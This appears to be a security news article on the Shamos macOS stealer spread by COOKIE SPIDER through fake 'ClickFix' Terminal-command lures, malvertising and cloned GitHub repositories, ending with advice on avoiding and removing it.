A new global campaign by the group COOKIE SPIDER is targeting Mac users with Shamos malware, an Atomic macOS Stealer variant that steals data by tricking users into running a terminal command.
Deceptive Atomic macOS Stealer Terminal Command
The attack uses a “ClickFix” tactic, luring victims with malvertising and spoofed tech help sites. These fake sites, with domains like mac-safer[.]com, appear in search results for common Mac issues such as “how to flush resolver cache.“
Victims are then convinced to copy and paste a one-line command into their Mac’s Terminal application. This action downloads and executes the malware directly, bypassing many built-in security protections.
Understanding the Threat of Shamos Malware
The Shamos malware is a new variant of the well-known Atomic macOS Stealer (AMOS). The cybercriminal group identified as COOKIE SPIDER is responsible for its development and distribution.
Once installed, the malware is designed to steal sensitive information from the infected device. It specifically targets Apple Notes, Keychain items, browser passwords, and cryptocurrency wallets for theft.
The stolen data is then sent to attacker-controlled servers. In some cases, the COOKIE SPIDER Shamos attack also delivers additional payloads, such as botnet modules or fake Ledger wallet applications, and can install persistence tools to restart with the system.
Executing a macOS Gatekeeper Bypass
The malicious one-line command is specifically crafted to achieve a macOS Gatekeeper bypass. This allows the unverified software to run without triggering the standard security prompts users would normally see.
Attackers also use fake GitHub repositories to spread the malware. They clone popular applications and tools, hiding the malicious code within repositories that appear legitimate to unsuspecting users.
How to Remove Shamos from Mac and Stay Safe
Users should never execute a terminal command from a website or forum unless they are an advanced user who fully understands its function. Always verify troubleshooting steps on Apple’s official support site or trusted community forums.
Exercise caution with sponsored ads in search results and stick to verified sources for technical help. When downloading from GitHub, always check the publisher’s name, activity history, and the repository’s reputation.
Keeping macOS up to date with automatic updates enabled is a critical step in patching vulnerabilities. For an additional layer of defense, security experts recommend installing a strong antivirus program.
